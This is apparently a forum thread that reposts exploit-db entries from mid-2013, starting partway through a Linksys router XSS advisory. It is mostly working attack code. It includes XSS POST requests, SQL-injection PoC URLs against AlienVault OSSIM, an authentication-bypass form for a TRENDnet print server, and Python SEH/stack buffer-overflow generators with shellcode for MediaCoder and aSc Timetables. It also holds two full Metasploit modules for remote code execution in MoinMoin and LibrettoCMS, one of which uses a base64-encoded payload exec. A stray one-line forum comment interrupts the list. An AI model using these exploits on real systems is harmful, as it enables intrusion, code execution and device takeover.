Accept-Encoding: gzip, deflate
Referer: http://192.168.178.188/DHCPTable.asp
Authorization: Basic XXX=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)//

=> Parameter: submit_button (6)

POST /apply.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.188/WanMAC.asp
Authorization: Basic XXX=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106

submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0

============
Solution
============
Update to version "v1.0.05 build 002 Feb 21,2013" to fix the following findings: 1, 2, 4, 5, 6

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============
Time Line:
============
28.01.2013 - discovered vulnerability
04.02.2013 - Reported vulnerability privately to vendor
22.02.2013 - Requested update
25.02.2013 - Linksys responded that there are no updates
18.03.2013 - Requested update
=> and some more update requests ...
08.05.2013 - Testing update from vendor
08.05.2013 - responded testing results
21.06.2013 - Linksys informed me about public available firmware update
22.06.2013 - public disclosure

=====================
Advisory end
=====================
  16. Author : Glafkos Charalambous Source : Alienvault OSSIM Open Source SIEM 4.1 Multiple SQL Vulnerabilities Code : # Title: Alienvault OSSIM Open Source SIEM 4.1 Multiple SQL Vulnerabilities # Date: February 15, 2013 # Author: Glafkos Charalambous # Vendor: AlienVault # Vendor URL: http://www.alienvault.com # Reported: February 17, 2013 Timeline: --------- 17 Feb 2013: Vulnerability Reported to AlienVault 19 Feb 2013: Sales Department replied if interested to migrate from OSSIM to AlienVault 19 Feb 2013: Asked if there is someone that can handle the security issues 22 Feb 2013: No Vendor response 22 Jun 2013: Public Disclosure Vendor Description: ------------------- OSSIM is the most widely used SIEM offering, thanks in no small part to the open source community that has promoted its use. OSSIM provides all of the capabilities that a security professional needs from a SIEM offering, event collection, normalization, correlation and incident response - but it also does far more. Not simply satisfied with integrating data from existing security tools, OSSIM is built on the Unified Security Management platform which provides a common framework for the deployment, configuration, and management of your security tools. 
Vulnerability Details: ---------------------- Blind SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sensor https://[host]/ossim/forensics/base_qry_main.php?new=1&num_result_rows=-1&sensor=SQL_INJECTION&submit=Query Get Parameter: tcp_flags https://[host]/ossim/forensics/base_stat_alerts.php?ossim/forensics/base_stat_alerts.php?current_view=-1 &layer4=TCP&num_result_rows=-1&sort_order=occur_d&tcp_flags[0]=SQL_INJECTION&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]= &tcp_port[0][5]= &tcp_port_cnt=1 Get Parameter: tcp_port https://[host]/ossim/forensics/base_stat_alerts.php?current_view=-1&layer4=TCP&num_result_rows=-1&sort_order=occur_d &tcp_flags[0]=&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]=SQL_INJECTION&tcp_port[0][5]= &tcp_port_cnt=1 GetParameter: ip_addr https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=192.168.0.11&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]=SQL_INJECTION&ip_addr[1][9]= &ip_addr_cnt=2&port_type=2&proto=6 Get Parameter: port_type https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=0.0.0.0&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]= &ip_addr[1][9]= &ip_addr_cnt=2&port_type=SQL_INJECTION&proto=6 SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sortby https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=1&sortby=SQL_INJECTION&submit=Find&type=scantime&withoutmenu=1 Get Parameter: rvalue 
https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=SQL_INJECTION&sortby=&submit=Find&type=scantime&withoutmenu=1
  17. Author : Chako Source : TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability Code : ############################################################# # # Exploit Title: TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability # Date: 2013/6/20 # Exploit Author: Chako # Firmware Version: 4.11 # Tested on: Windows 7 ############################################################# Description: ===================== A remote authentication bypass vulnerability affects the TRENDnet TE100-P1U Print Server. This issue is due to a failure of the application to validate authentication credentials when processing print server configuration change requests. An attacker could reset the print server to factory settings or change its IP address without a password security check. Exploit: ===================== 1)Reset Print Server To Factory Settings <form action="http://IP/Reply.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Factory Reset</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr> </tbody></table><br> <input name="Factory" value=" Yes " type="submit" width="60"> </form> 2)Change Print Server IP Address <form action="http://IP/Network.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Change IP Address</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td> <td bgcolor="#F0F0F0" valign="top"> <table border="0"> <tbody><tr><td> <input name="IP_ASSIGN" value="1" type="radio">Manually Assign <table border="0" cellpadding="3" 
cellspacing="0"> <tbody><tr> <td width="20"></td><td>IP Address</td> <td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td> </tr> <tr> <td></td><td>Subnet Mask</td> <td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td> </tr> <tr> <td></td><td>Default Gateway</td> <td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td> </tr> </tbody></table> </td></tr> </tbody></table> </td> </tr> </tbody></table> <table border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td height="50" width="149"> </td> <td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td> </tr> </tbody></table> </form>
  18. Author : Dark-Puzzle Source : aSc Timetables 2013 - Stack Buffer Overflow Vulnerability Code : #!/usr/bin/python # Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability # Researcher : Souhail Hammou (Dark-Puzzle) # Research Team : http://itsecurity.ma # Facebook : http://www.facebook.com/dark.puzzle.sec # Date : 22/06/2013 # Download Website : www.asctimetables.com/download_en.html ########################################################## # Software Details : # ASC timetables is a school scheduling software used widely by many schools around the globe to generate unique timetables for students. # it has the features to add school subjects , teachers and manipulate time. # Vulnerability details : # The buffer overflow vulnerability resides in the Add subject functionality, and it's triggered when the user will submit a large string when specifying the #school subject name. To trigger the vulnerability go to the main menu , select subjects , click new then generate a string with the code below and the #software will execute the shellcode which will popup a MessageBox. # Picture : http://oi40.tinypic.com/30rwc2q.jpg garbage = "D"*512 eip = "\xCB\xC0\x8F\x75" #JMP ESP from kernel32.dll nopsled = "\x90"*177 shellcode = "\xB8\x23\x58\xA7\x11\x2D\x11\x11\x11\x11\x6A\x14\x50\x50\x33\xC0\x50\xB8\x98\x34\x69\x11\x2D\x11\x11\x11\x11\xFF\xE0" # I have written this shellcode which will popup a "Yes/No" MessageBox with Title and Message : iteDump #MOV EAX,11A75823 #SUB EAX,11111111 #PUSH 14 #PUSH EAX #PUSH EAX #XOR EAX,EAX #PUSH EAX #MOV EAX,11693498 #SUB EAX,11111111 #JMP EAX ToInsert = open("file.txt", "w") ToInsert.write(garbage+eip+nopsled+shellcode) ToInsert.close()
  19. Author : metacom Source : MediaCoder PMP Edition 0.8.17 (.m3u) - Buffer Overflow Exploit Code : print """ [+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) [+]Download link: http://www.mediacoderhq.com/device/mpx.htm [+]Vulnerable Product: MediaCoder (Personal Media Player) Edition [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ from struct import pack junk = "http://" + "\x41" * 765 nseh = "\xeb\x06\x90\x90" seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell=("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = junk + nseh + seh + nops + shell try: rst= open("mediacoder-pmp.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  20. Author : metacom Source : Mediacoder (.m3u) - SEH Buffer Overflow Code : #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:m3u [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell 
try: rst= open("All-MediaCoder.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  21. Author : metacom Source : Mediacoder (.lst) - SEH Buffer Overflow Code : #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:lst [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell 
try: rst= open("All-MediaCoder.lst",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  22. Matt

    The time has come

    It would be better to close the topic, it won't go anywhere. It will fill up with trolls and flames.
  23. Author : Metasploit Source : MoinMoin twikidraw Action Traversal File Upload Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/adfa15e3e37cf26b4b014f209959e9d9-moin-1.9.5.tar.gz Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MoinMoin twikidraw Action Traversal File Upload', 'Description' => %q{ This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability exists on the manage of the twikidraw actions, where a traversal path can be used in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi configurations by overwriting moin.wsgi, which allows to execute arbitrary python code, as exploited in the wild on July, 2012. The user is warned to use this module at his own risk since it's going to overwrite the moin.wsgi file, required for the correct working of the MoinMoin wiki. While the exploit will try to restore the attacked application at post exploitation, correct working after all isn't granted. 
}, 'Author' => [ 'Unknown', # Vulnerability discovery 'HTP', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-6081' ], [ 'OSVDB', '88825' ], [ 'BID', '57082' ], [ 'EDB', '25304' ], [ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ], [ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ] ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'Space' => 16384, # Enough one to fit any payload 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet netcat perl' } }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'MoinMoin 1.9.5', { }]], 'DisclosureDate' => 'Dec 30 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "MoinMoin base path", "/" ]), OptString.new('WritablePage', [ true, "MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)", "/WikiSandBox" ]), OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) ], self.class) end def moinmoin_template(path) template =[] template << "# -*- coding: iso-8859-1 -*-" template << "import sys, os" template << "sys.path.insert(0, 'PATH')".gsub(/PATH/, File.dirname(path)) template << "from MoinMoin.web.serving import make_application" template << "application = make_application(shared=True)" return template end def restore_file(session, file, contents) first = true contents.each {|line| if first session.shell_command_token("echo \"#{line}\" > #{file}") first = false else session.shell_command_token("echo \"#{line}\" >> #{file}") end } end # Try to restore a basic moin.wsgi file with the hope of making the # application usable again. # Try to search on /usr/local/share/moin (default search path) and the # current path (apache user home). 
Avoiding to search on "/" because it # could took long time to finish. def on_new_session(session) print_status("Trying to restore moin.wsgi...") begin files = session.shell_command_token("find `pwd` -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } files = session.shell_command_token("find /usr/local/share/moin -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } print_warning("Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.") rescue print_warning("Error while restring moin.wsgi, manual restoring would be required.") end end def do_login(username, password) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'vars_post' => { 'action' => 'login', 'name' => username, 'password' => password, 'login' => 'Login' } }) if not res or res.code != 200 or not res.headers.include?('Set-Cookie') return nil end return res.get_cookies end def upload_code(session, code) vprint_status("Retrieving the ticket...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'modify', 'target' => '../../../../moin.wsgi' } }) if not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/ vprint_error("Error retrieving the ticket") return nil end ticket = $1 vprint_good("Ticket found: #{ticket}") my_payload = "[MARK]#{code}[MARK]" post_data = Rex::MIME::Message.new post_data.add_part("drawing.r if()else[]\nexec eval(\"open(__file__)\\56read()\\56split('[MARK]')[-2]\\56strip('\\\\0')\")", nil, nil, "form-data; name=\"filename\"") post_data.add_part(my_payload, "image/png", nil, "form-data; name=\"filepath\"; filename=\"drawing.png\"") my_data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = 
send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'save', 'ticket' => ticket, 'target' => '../../../../moin.wsgi' }, 'data' => my_data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if not res or res.code != 200 or not res.body.empty? vprint_error("Error uploading the payload") return nil end return true end def check @base = target_uri.path @base << '/' if @base[-1, 1] != '/' res = send_request_cgi({ 'uri' => normalize_uri(@base) }) if res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/ return Exploit::CheckCode::Detected elsif res return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def writable_page?(session) res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, }) if not res or res.code != 200 or res.body !~ /Edit \(Text\)/ return false end return true end def exploit # Init variables @page = datastore['WritablePage'] @base = target_uri.path @base << '/' if @base[-1, 1] != '/' # Login if needed if (datastore['USERNAME'] and not datastore['USERNAME'].empty? and datastore['PASSWORD'] and not datastore['PASSWORD'].empty?) 
print_status("Trying login to get session ID...") session = do_login(datastore['USERNAME'], datastore['PASSWORD']) else print_status("Using anonymous access...") session = "" end # Check authentication if not session fail_with(Exploit::Failure::NoAccess, "Error getting a session ID, check credentials or WritablePage option") end # Check writable permissions if not writable_page?(session) fail_with(Exploit::Failure::NoAccess, "There are no write permissions on #{@page}") end # Upload payload print_status("Trying to upload payload...") python_cmd = "import os\nos.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))" res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))") if not res fail_with(Exploit::Failure::Unknown, "Error uploading the payload") end # Execute payload print_status("Executing the payload...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'AttachFile' } }, 5) end end
  24. Author : Metasploit Source : LibrettoCMS File Manager Arbitary File Upload Vulnerability Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/3a6192ec846b3cb66f62e7c998442bf4-librettoCMS_v.2.2.2.zip Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability", 'Description' => %q{ This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and possibly prior. Attackers bypass the file extension check and abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'CWH', 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '94391'], ['EDB', '26213'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => ['linux', 'php'], 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Jun 14 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/']) ], self.class) end def peer "#{rhost}:#{rport}" end def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Powered by <a href=".+">Libretto CMS/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload(base) p = get_write_exec_payload(:unlink_self=>true) fname = "#{Rex::Text.rand_text_alpha(6)}.pdf" data = Rex::MIME::Message.new data.add_part(fname, nil, nil, "form-data; name=\"Filename\"") data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"") data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"') post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'vars_get' => {'type'=>'all files'} }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading") elsif res.code.to_i != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}") end fname end def rename(base, original_fname) new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php" uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 
'pgrfilemanager', 'php', 'files.php') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_get' => { 'type' => 'all files' }, 'vars_post' => { 'fun' => 'renameFile', 'dir' => '', 'filename' => original_fname, 'newFilename' => new_name } }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while renaming") elsif res.body !~ /"res":"OK"/ fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to rename file") end new_name end def exec(base, payload_fname) res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) }) if res and res.code.to_i == 404 fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}") end end def exploit base = target_uri.path print_status("#{peer} - Uploading malicious file...") orig_fname = upload(base) print_status("#{peer} - Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) print_status("#{peer} - Executing #{new_fname}...") exec(base, new_fname) end end